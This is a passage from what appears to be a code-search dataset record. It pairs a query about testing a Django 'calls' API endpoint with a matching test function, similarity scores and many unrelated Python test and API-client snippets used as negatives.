tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_open_api(self):\n response = self.client.get(self.initiatives_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_api_response_data(self):", "def test_index(self):\n resp = self.app.get('/')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertIn('Inventory Demo REST API Service', resp.data)\n # resp = self.app.get('/')\n # self.assertEqual(resp.status_code, status.HTTP_200_OK)\n # data = json.loads(resp.data)\n # self.assertEqual(data['name'], 'Inventory Demo REST API Service')", "def test_api_ping_success(self):\r\n res = self.testapp.get('/api/v1/admin/ping?api_key=' + API_KEY,\r\n status=200)\r\n ping = json.loads(res.body)\r\n\r\n self.assertTrue(ping['success'])\r\n\r\n self._check_cors_headers(res)", "def test_request_users_user(self):\n response = requests.get(self.url + '/users/John')\n\n self.assertEqual(response.status_code, 200)\n self.assertIsNone(response.json())" ]
[ "0.7947968", "0.7947968", "0.7879138", "0.77913356", "0.77913356", "0.77886796", "0.76140255", "0.75884384", "0.7562267", "0.75419384", "0.75371504", "0.75371504", "0.7369333", "0.7351754", "0.7339209", "0.73001033", "0.72693115", "0.7259427", "0.72563964", "0.721277", "0.7197149", "0.7195686", "0.7183881", "0.7172894", "0.71702355", "0.7159556", "0.71461135", "0.71298665", "0.712279", "0.71111274", "0.7103449", "0.70962155", "0.70949024", "0.70797604", "0.7077542", "0.706866", "0.7059295", "0.7049227", "0.7038257", "0.70377374", "0.70194644", "0.7014586", "0.69977385", "0.69856936", "0.6977616", "0.6958035", "0.69572264", "0.69558394", "0.69535625", "0.69438034", "0.6901962", "0.6895813", "0.68907535", "0.6888978", "0.68757", "0.68717796", "0.6862393", "0.6848112", "0.6846643", "0.68444765", "0.68403125", "0.68285054", "0.6820725", "0.6811993", "0.68114346", "0.68107563", "0.68090415", "0.6789841", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67733514", "0.67733514", "0.67733514", "0.67733514", "0.67733514", "0.6761728", "0.6760909", "0.6743141", "0.6742817", "0.6742001" ]
0.8886346
0
Test if there is a Call API endpoint and if is defined as "calls" namespace and "calllist" as his name
def test_namespace_of_call_api_endpoint(): url = '/api/v1/calls/' resolved = resolve(url) assert resolved.namespace == 'calls'\ and resolved.url_name == 'call-list'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def endpoint_checker(url):\r\n if \"/arcgis/rest/services/\" and \"http\" in url:\r\n return True\r\n return False", "def isThereApiCalls(report):\n with open(report, \"rb\") as r:\n data = json.load(r)\n for i in range(numProcs(report)):\n if len(data[\"behavior\"][\"processes\"][i][\"calls\"]) > 0:\n return True\n else:\n continue\n return False", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def test_all_endpoint_status():\n r = client.get('/openapi.json')\n assert r.status_code == 200\n for e in r.json()['paths'].keys():\n r = client.get(e)\n assert r.status_code == 200\n\n for e in ['plot']:\n r = client.get(e)\n assert r.status_code == 200", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def isCall(self) -> bool:\n ...", "def test_GET_call_api_and_return_200Ok(client):\n\n url = '/api/v1/calls/'\n\n response = client.get(url)\n\n assert response.status_code == status.HTTP_200_OK", "def test_calls_in_list_with_names_only(self):\n some_calls = [Call(\"one\"), Call(\"two\")]\n assert_that(some_calls, has_item(Call(\"one\")))\n assert_that(some_calls, has_item(Call(\"two\")))\n assert_that(some_calls, is_not(has_item(Call(\"three\"))))", "def _test_single_prerecorded_api_call(app, path, prerecorded, contexts={}):\n rv = app.get(path)\n assert rv.status_code == 200\n response = json.loads(rv.get_data().decode('utf8'))\n if type(prerecorded) is list:\n response = response['items']\n compare_objects(contexts, '', prerecorded, response)\n return False", "def test_list_namespaced_route(self):\n pass", "def test_list_endpoints(self):\n routes = [\n '/',\n '/npm/<name>',\n '/nuget/<name>',\n '/ping',\n '/ping/npm',\n '/ping/nuget',\n '/ping/pypi',\n '/ping/rubygems',\n '/pypi/<name>',\n '/rubygems/<name>',\n ]\n expected = {}\n for num, route in enumerate(routes):\n expected[str(num)] = route\n\n response = self.app.get('/')\n assert json.loads(response.data) == expected", "def __nonzero__(self):\n return self.has_apicalls", "def valid_endpoint(cls):\n\t\treturn cls.__subclasses__() == []", "def check_endpoint_in_paths(context, endpoint):\n data = context.response.json()\n paths = check_and_get_attribute(data, \"paths\")\n assert endpoint in paths, \"Cannot find the expected endpoint {e}\".format(\n e=endpoint)", "def is_incall_dialing(self) -> bool:", "def _api_call(self, url, response_checker):\n self.request_compare(url)", "def test_list_net_namespace(self):\n pass", "def test_if_app_gets_shoppinglists(self):\n li = self.client.get('/shoppinglists/?each_page=1&page_number=1',\n headers = {\n 'Content-Type':'application/json',\n 'x-access-token':self.tok})\n self.assertEqual(li.status_code, 200)", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def call_status():\n\n if 'mocean-call-uuid' in request.form:\n call_uuid = request.form.get('mocean-call-uuid')\n logging.info(f'### Call status received [{call_uuid}] ###')\n for k, v in request.form.items():\n logging.info(f'\\t{k}:{v}')\n\n if request.form.get('mocean-call-uuid') in calls \\\n and request.form.get('mocean-status') == 'HANGUP':\n logging.debug(f'Deleting call-uuid[{call_uuid}] from calls dict')\n del calls[call_uuid]\n call_ended.append(call_uuid)\n return Response('', status=204, mimetype='text/plain')\n else:\n return invalid_response()", "def is_incall_connected(self) -> bool:", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def check_schema_existence_api_call(context, schema, version):\n check_schema_existence(context, schema, version, \"api\")", "def check_api(self):\n catalog = self.service_catalog\n for service in catalog:\n if service['name'] not in self.RESOURCE_MAP:\n self.logger.notice(\"Don't know how to check service '%s'\" %\n service['name'])\n status = self.UNKNOWN\n else:\n r = self.get(service['name'],\n self.RESOURCE_MAP[service['name']])\n if not r or r.status_code < 200 or r.status_code > 299:\n status = self.FAIL\n else:\n status = self.OK\n\n yield {\n 'service': service['name'],\n 'status': status,\n 'region': service['region']\n }", "def test_request(self):\n self.assertIn('list', self.api.request('sys.settings.get').data,\n msg=\"request() doesn't work properly. 'list' is not found in the response\")", "def test_documentation_for_call_view():\n\n url = reverse_lazy('calls:call-list')\n view = resolve(url).func\n\n assert view.__doc__", "def test_application_rules(self, mocked_get, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with aplpication name\n self.assertDictEqual(rpc.get_application_rules('appli'), \n {'application_name': 'appli','start': 1, 'stop': 2, 'required': True})\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli')], mocked_get.call_args_list)", "def _api_query(\n self,\n endpoint: Literal[\n 'configs_list_currency',\n 'configs_list_pair_exchange',\n 'configs_map_currency_symbol',\n 'movements',\n 'trades',\n 'wallets',\n ],\n options: Optional[dict[str, Any]] = None,\n ) -> Response:\n call_options = options.copy() if options else {}\n for header in ('Content-Type', 'bfx-nonce', 'bfx-signature'):\n self.session.headers.pop(header, None)\n\n if endpoint == 'configs_list_currency':\n method = 'get'\n api_path = 'v2/conf/pub:list:currency'\n request_url = f'{self.base_uri}/{api_path}'\n elif endpoint == 'configs_list_pair_exchange':\n method = 'get'\n api_path = 'v2/conf/pub:list:pair:exchange'\n request_url = f'{self.base_uri}/{api_path}'\n elif endpoint == 'configs_map_currency_symbol':\n method = 'get'\n api_path = 'v2/conf/pub:map:currency:sym'\n request_url = f'{self.base_uri}/{api_path}'\n elif endpoint == 'movements':\n method = 'post'\n api_path = 'v2/auth/r/movements/hist'\n request_url = f'{self.base_uri}/{api_path}?{urlencode(call_options)}'\n elif endpoint == 'trades':\n method = 'post'\n api_path = 'v2/auth/r/trades/hist'\n request_url = f'{self.base_uri}/{api_path}?{urlencode(call_options)}'\n elif endpoint == 'wallets':\n method = 'post'\n api_path = 'v2/auth/r/wallets'\n request_url = f'{self.base_uri}/{api_path}'\n else:\n raise AssertionError(f'Unexpected {self.name} endpoint type: {endpoint}')\n\n with self.nonce_lock:\n # Protect this region with a lock since Bitfinex will reject\n # non-increasing nonces for authenticated endpoints\n if endpoint in ('movements', 'trades', 'wallets'):\n nonce = str(ts_now_in_ms())\n message = f'/api/{api_path}{nonce}'\n signature = hmac.new(\n self.secret,\n msg=message.encode('utf-8'),\n digestmod=hashlib.sha384,\n ).hexdigest()\n self.session.headers.update({\n 'Content-Type': 'application/json',\n 'bfx-nonce': nonce,\n 'bfx-signature': signature,\n })\n\n log.debug(f'{self.name} API request', request_url=request_url)\n try:\n response = self.session.request(\n method=method,\n url=request_url,\n )\n except requests.exceptions.RequestException as e:\n raise RemoteError(\n f'{self.name} {method} request at {request_url} connection error: {e!s}.',\n ) from e\n\n return response", "def test_api_lookup(self):\n\n # Set up the url for the api call\n\n expected_url = 'https://www.gov.uk/api/content{}'.format(self.urlsclass.dedupurls[0])\n\n # Make request and extract json.\n\n expected = requests.get(expected_url).json()\n\n assert api_lookup(self.urlsclass.dedupurls[0], 'https://www.gov.uk/api/content') == expected", "def test_call(schemas, expected_calls):\n model_factory = mock.MagicMock()\n\n define_all.define_all(model_factory=model_factory, schemas=schemas)\n\n model_factory.assert_has_calls(\n list(mock.call(name=name) for name in expected_calls)\n )", "def test_list_route_for_all_namespaces(self):\n pass", "def _get_allowed_calls(self):\n return self.visa.calls", "def get_api_calls(api_functions=api_functions, ignore_unfound=False):\n functions = [(n,f) for (n,f) in api_functions if getattr(f, \"is_api\", False)]\n functions = sorted(functions, key=lambda (n,f): n)\n ret = []\n for function in functions:\n try:\n ret.append(APICall(function))\n except NoReverseMatch:\n if not ignore_unfound:\n raise\n return ret", "def test_1():\n\tassert api_call().status_code == 200", "def test_format_price_api_url_exists(self):\n self.assertIsNotNone(format_price_api_url)", "def test_read_namespaced_route_status(self):\n pass", "def calls_cmd(args):\n r = requete(\"VoiceService.VoiceApplication:getCallList\")\n if r is None or not 'status' in r:\n return\n\n r = r['status']\n if len(args) == 1 and args[0] == '?':\n return print(r[0].keys())\n\n for i in r:\n if len(args) > 0:\n print(i[args[0]])\n else:\n if i['callOrigin'] == 'local':\n arrow = '<=='\n else:\n arrow = '==>'\n print(\"{:>3} {} {:16} {} {} {:10}\".format(\n i['callId'],\n arrow,\n i['remoteNumber'] if i['remoteNumber'] != '' else '**********',\n parsedate.isoparse(i['startTime']).astimezone(tz.tzlocal()),\n str(datetime.timedelta(seconds=int(i['duration']))),\n i['callType']\n ))", "def test_list(self):\n response = self.client.get('/routines/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 2)\n self.assertEqual(len(response.data['results']), 2)\n self.assertEqual(response.data['results'][0]['id'], self.rout1.id)", "def http_get(call):\n\n verify_ssl = (\n True if \"verify_ssl\" not in call.data.keys() else call.data[\"verify_ssl\"]\n )\n\n headers = basic_headers\n if \"headers\" in call.data.keys():\n headers.update(call.data[\"headers\"])\n\n auth = None\n if \"auth_username\" in call.data.keys() and \"auth_password\" in call.data.keys():\n auth = (\n call.data[\"auth_username\"]\n if \"auth_username\" in call.data.keys()\n else None,\n call.data[\"auth_password\"]\n if \"auth_password\" in call.data.keys()\n else None,\n )\n\n resp = requests.get(\n url=call.data[\"url\"],\n params=call.data[\"get_params\"]\n if \"get_params\" in call.data.keys()\n else None,\n headers=headers,\n verify=verify_ssl,\n timeout=10,\n auth=auth,\n )\n\n return resp.status_code == 200", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_get$\", response.content)", "def test_beneficiaries_list_connectivity_that_will_pass(self):\n print('the test function name: {}'.format(sys._getframe().f_code.co_name))\n url = reverse('beneficiary:beneficiaries-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def exists(self, name):\n return self.endpoint.exists(name)", "def test_get_api_resources(self):\n pass", "def testListEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Empty list\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n self.assertListEqual(json.loads(response), [])\n\n # Register some endpoints\n svc_regs = []\n for _ in range(3):\n # Register a service\n svc_regs.append(\n context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"}))\n\n # Request the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)\n\n # Unregister them\n for svc_reg in svc_regs:\n # Unregister the service\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)", "def is_service_endpoint(path):\n return re.match(r'^[a-zA-Z0-9.-]+:\\d+$', path)", "def _call_endpoint(url_suffix: str, base_url: str = BASE_URL) -> dict:\n headers = _get_headers()\n url = os.path.join(base_url, url_suffix)\n resp = requests.get(url, headers=headers)\n return resp.json()", "def test_get_specific_contact_list(self):\n contact_list = ContactList.objects.first()\n url, parsed = self.prepare_urls('v1:contact_list-detail', subdomain=self.company.subdomain, kwargs={'pk':contact_list.id})\n\n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n self.authenticate_user()\n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def is_list_request(message):\n list_found = re.search(\"list\", message)\n\n return list_found is not None", "def have_api(self, *apis):\n if not all(apis):\n logger.log('DEBUG', f'{self.source} module is not configured')\n return False\n return True", "def testGetSeveralForOne(self):\n types = ['http://lid.netmesh.org/sso/2.0b5',\n 'http://lid.netmesh.org/2.0b5'\n ]\n\n reference_uri = \"http://mylid.net/josh\"\n\n for element in self._getServices():\n if xrds.getURI(element) == reference_uri and \\\n xrds.getTypeURIs(element) == types:\n break\n else:\n self.fail('Did not find service with expected types and uris')", "def apiName(self, name):\n return self.genOpts.conventions.is_api_name(name)", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_post$\", response.content)", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def rpc_match():", "def test_basic_api(self):\n self.create_and_verify_stack(\"single/basic_api\")\n\n first_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n self.set_template_resource_property(\"MyApi\", \"DefinitionUri\", self.get_s3_uri(\"swagger2.json\"))\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def api_list(resource_name):\n if ':' in resource_name:\n api_name, resource_name = resource_name.split(':', 1)\n else:\n api_name = 'v1'\n return reverse('api_dispatch_list', kwargs={\n 'api_name': api_name,\n 'resource_name': resource_name,\n }) + '?format=json'", "def process_calls():\n try:\n sdplus_api = API(os.environ['SDPLUS_ADMIN'], 'http://sdplus/sdpapi/')\n if not sdplus_api:\n raise KeyError\n except KeyError:\n print('Windows environment varible for \"SDPLUS_ADMIN\" (the API key for sdplus) wasn\\'t found. \\n'\n 'Please correct using \"\"setx SDPLUS_ADMIN <insert your own SDPLUS key here>\" in a command line.')\n sys.exit(1)\n result = []\n all_queues = sdplus_api.request_get_requests('Back Office Third Party/CSC_QUEUE')\n for each_call in all_queues:\n conversations = sdplus_api.request_get_all_conversations(each_call['workorderid'])\n each_call['classification'] = classify_call(conversations)\n each_call['Others involved'] = find_all_people_involved(conversations, each_call['requester'])\n each_call['CSC open/reopen date'] = find_date_csc_opened_call(conversations)\n each_call['CSC severity'] = find_csc_severity(conversations)\n result.append(each_call)\n return result", "def test_read_namespaced_route(self):\n pass", "def test_view_url_exists_api_alerts(self):\n response = self.client.get('/api/alerts/')\n self.assertEqual(response.status_code, 200)", "def test_root_api(self):\n\n # GIVEN API\n\n # WHEN fetching available applications and models\n response = self.api.root_api()\n\n # THEN it should succeed\n self.assertTrue(response.success)\n\n # AND it should have valid data\n for item in response.data:\n self.assertEqual(len(item.keys()), 3)\n self.assertEqual(set(item.keys()), set(['model', 'actions', 'app_label']))\n\n # AND it contains also UI application models\n self.assertTrue(any('test' in d['app_label'] for d in response.data))\n\n # AND public applications are also available\n data = [item for item in response.data if item['app_label'] == 'admin']\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0]['model'], None)\n self.assertEqual(len(data[0]['actions'].keys()), 2)", "def is_api_method(obj, name):\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return (ismethod(method) and hasattr(method, \"__api_call\"))", "def check_internal_api_for_subscription(namespace_user):\n plans = []\n if namespace_user.organization:\n query = organization_skus.get_org_subscriptions(namespace_user.id)\n org_subscriptions = list(query.dicts()) if query is not None else []\n for subscription in org_subscriptions:\n subscription_id = subscription[\"subscription_id\"]\n sku = marketplace_subscriptions.get_subscription_sku(subscription_id)\n plans.append(get_plan_using_rh_sku(sku))\n pass\n else:\n user_account_number = marketplace_users.get_account_number(namespace_user)\n if user_account_number:\n plans = marketplace_subscriptions.get_list_of_subscriptions(\n user_account_number, filter_out_org_bindings=True, convert_to_stripe_plans=True\n )\n return plans", "def api_callcounter():\n try:\n return jsonify({'callcounter': get_model().call_counter})\n except Exception as e:\n response = jsonify({'error': 'API error'})\n response.status_code = 400\n return response", "def test_all_applications_info(self, mocked_get, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.applications = {\n 'dummy_1': None, 'dummy_2': None}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'appli_1'}, {'name': 'appli_2'}],\n rpc.get_all_applications_info())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertItemsEqual([call('dummy_1'), call('dummy_2')],\n mocked_get.call_args_list)", "def request_endpoints(self):\n\n endpoints_url = self.std[\"api\"]\n endpoints_paramd = {\n \"access_token\": self.std[\"access_token\"]\n }\n\n endpoints_response = requests.get(url=endpoints_url, params=endpoints_paramd)\n print endpoints_response\n self.endpointd = endpoints_response.json()[0]", "def is_http(self):\n for _, topic_info in self.resources.items():\n if topic_info.get(\"subscription\"):\n return True\n return False", "def _test_network_list_for_tenant(\n self, include_external, filter_params, should_called,\n expected_networks, source_networks=None, **extra_kwargs):\n has_more_data = None\n has_prev_data = None\n marker_calls = []\n filter_params = filter_params or {}\n if 'page_data' not in extra_kwargs:\n call_args = {'single_page': False}\n else:\n sort_dir = extra_kwargs['page_data']['sort_dir']\n # invert sort_dir for calls\n sort_dir = 'asc' if sort_dir == 'desc' else 'desc'\n call_args = {'single_page': True, 'limit': 21, 'sort_key': 'id',\n 'sort_dir': sort_dir}\n marker_id = extra_kwargs['page_data'].get('marker_id')\n if extra_kwargs.get('marker_calls') is not None:\n marker_calls = extra_kwargs.pop('marker_calls')\n\n tenant_id = '1'\n return_values = []\n all_networks = (self.networks.list() if source_networks is None\n else source_networks)\n\n expected_calls = []\n call_order = ['shared', 'non_shared', 'external']\n if call_args.get('sort_dir') == 'desc':\n call_order.reverse()\n\n for call in call_order:\n if call in should_called:\n params = filter_params.copy()\n params.update(call_args)\n if call in marker_calls:\n params.update({'marker': marker_id})\n if call == 'external':\n params['router:external'] = True\n params['shared'] = False\n return_values.append(\n [n for n in all_networks\n if n['router:external'] is True and\n n['shared'] is False])\n expected_calls.append(\n mock.call(test.IsHttpRequest(), **params))\n elif call == 'shared':\n params['shared'] = True\n external = params.get('router:external')\n return_values.append(\n [n for n in all_networks\n if (n['shared'] is True and\n n['router:external'] == (\n external if external is not None\n else n['router:external']))])\n expected_calls.append(\n mock.call(test.IsHttpRequest(), **params))\n elif call == 'non_shared':\n params['shared'] = False\n external = params.get('router:external')\n return_values.append(\n [n for n in all_networks\n if (n['tenant_id'] == '1' and\n n['shared'] is False and\n n['router:external'] == (\n external if external is not None\n else n['router:external']))])\n expected_calls.append(\n mock.call(test.IsHttpRequest(),\n tenant_id=tenant_id, **params))\n self.mock_network_list.side_effect = return_values\n\n extra_kwargs.update(filter_params)\n ret_val = api.neutron.network_list_for_tenant(\n self.request, tenant_id,\n include_external=include_external,\n **extra_kwargs)\n if 'page_data' in extra_kwargs:\n has_more_data = ret_val[1]\n has_prev_data = ret_val[2]\n ret_val = ret_val[0]\n self.mock_network_list.assert_has_calls(expected_calls)\n self.assertEqual(set(n.id for n in expected_networks),\n set(n.id for n in ret_val))\n self.assertNotIn(api.neutron.AUTO_ALLOCATE_ID,\n [n.id for n in ret_val])\n return ret_val, has_more_data, has_prev_data", "def test_rpcCall(self):\n pass", "def test_simple1(self):\n api = self.load_api_description('simple1.json')\n self.assertEqual(api.name, 'Starbucks')\n self.assertEqual(len(api.resources), 1)\n\n resource = api.resources[0]\n self.assertEqual(resource.name, 'AllOrders')\n self.assertEqual(resource.path, '/')\n self.assertEqual(len(resource.operations), 1)\n\n operation = resource.operations[0]\n self.assertEqual(operation.method, 'GET')\n self.assertIsNone(operation.input)\n output = operation.output\n self.assertEqual(output.status, 200)\n self.assertEqual(output.type.type.get_reference_name(), 'list(string)')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n self.assertEqual(len(api.base), 1)\n self.assertEqual(api.base[0], 'http://test.com/starbucks')", "def test_404(self):\n response = self.make_call(origin='Milano Lambrate', destination='Milano Cadorna')\n self.assert400(response)", "def test_fax_inbound_automations_get(self):\n pass", "def test_get_callers():\n assert re.search(\"midgard.tests.dev.test_util.test_get_callers\", util.get_callers())", "def test_is_ghibli_api_request_working(self):\n\n films = retrieveMoviesFromGhibliAPI()\n self.assertIs(type(films), list)\n\n for film in films:\n self.assertTrue('people' in film)", "def response_validator(url_dict, host_name_ip, api_endpoint):\r\n for key, value in url_dict.items():\r\n url_framed = url_framer_or_formatter(value.strip(),host_name_ip) + api_endpoint\r\n logger.debug(\"{} Executing request for {}::{} {}\".format(\"#\" * 20, key,url_framed, \"#\" * 20))\r\n status_code, response_data, error_msg = common_http_validator(method='GET', url=url_framed)\r\n if status_code == 200:\r\n logger.debug(\"{} ok status obtained with response message as {}\".format(status_code,json.loads(response_data)['status']))\r\n else:\r\n logger.debug(\"{} status with response as {} and exception message as {}\".format(status_code,response_data,error_msg))\r\n\r\n logger.debug(\"{} Request execution completed for {}::{} {}\".format(\"#\" * 20, key,url_framed, \"#\" * 20))", "def endpoint_present(\n name,\n publicurl=None,\n internalurl=None,\n adminurl=None,\n region=None,\n profile=None,\n url=None,\n interface=None,\n **connection_args\n):\n ret = {\"name\": name, \"changes\": {}, \"result\": True, \"comment\": \"\"}\n\n _api_version(profile=profile, **connection_args)\n\n endpoint = __salt__[\"keystone.endpoint_get\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n\n def _changes(desc):\n return ret.get(\"comment\", \"\") + desc + \"\\n\"\n\n def _create_endpoint():\n if _OS_IDENTITY_API_VERSION > 2:\n ret[\"changes\"] = __salt__[\"keystone.endpoint_create\"](\n name,\n region=region,\n url=url,\n interface=interface,\n profile=profile,\n **connection_args\n )\n else:\n ret[\"changes\"] = __salt__[\"keystone.endpoint_create\"](\n name,\n region=region,\n publicurl=publicurl,\n adminurl=adminurl,\n internalurl=internalurl,\n profile=profile,\n **connection_args\n )\n\n if endpoint and \"Error\" not in endpoint and endpoint.get(\"region\") == region:\n\n if _OS_IDENTITY_API_VERSION > 2:\n\n change_url = False\n change_interface = False\n\n if endpoint.get(\"url\", None) != url:\n ret[\"comment\"] = _changes(\n 'URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"url\", None), url\n )\n )\n change_url = True\n\n if endpoint.get(\"interface\", None) != interface:\n ret[\"comment\"] = _changes(\n 'Interface changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"interface\", None), interface\n )\n )\n change_interface = True\n\n if __opts__.get(\"test\") and (change_url or change_interface):\n ret[\"result\"] = None\n ret[\"changes\"][\"Endpoint\"] = \"Will be updated\"\n ret[\"comment\"] += 'Endpoint for service \"{}\" will be updated'.format(\n name\n )\n return ret\n\n if change_url:\n ret[\"changes\"][\"url\"] = url\n\n if change_interface:\n ret[\"changes\"][\"interface\"] = interface\n\n else:\n change_publicurl = False\n change_adminurl = False\n change_internalurl = False\n\n if endpoint.get(\"publicurl\", None) != publicurl:\n change_publicurl = True\n\n ret[\"comment\"] = _changes(\n 'Public URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"publicurl\", None), publicurl\n )\n )\n\n if endpoint.get(\"adminurl\", None) != adminurl:\n change_adminurl = True\n ret[\"comment\"] = _changes(\n 'Admin URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"adminurl\", None), adminurl\n )\n )\n\n if endpoint.get(\"internalurl\", None) != internalurl:\n change_internalurl = True\n ret[\"comment\"] = _changes(\n 'Internal URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"internalurl\", None), internalurl\n )\n )\n\n if __opts__.get(\"test\") and (\n change_publicurl or change_adminurl or change_internalurl\n ):\n ret[\"result\"] = None\n ret[\"comment\"] += 'Endpoint for service \"{}\" will be updated'.format(\n name\n )\n ret[\"changes\"][\"Endpoint\"] = \"Will be updated\"\n return ret\n\n if 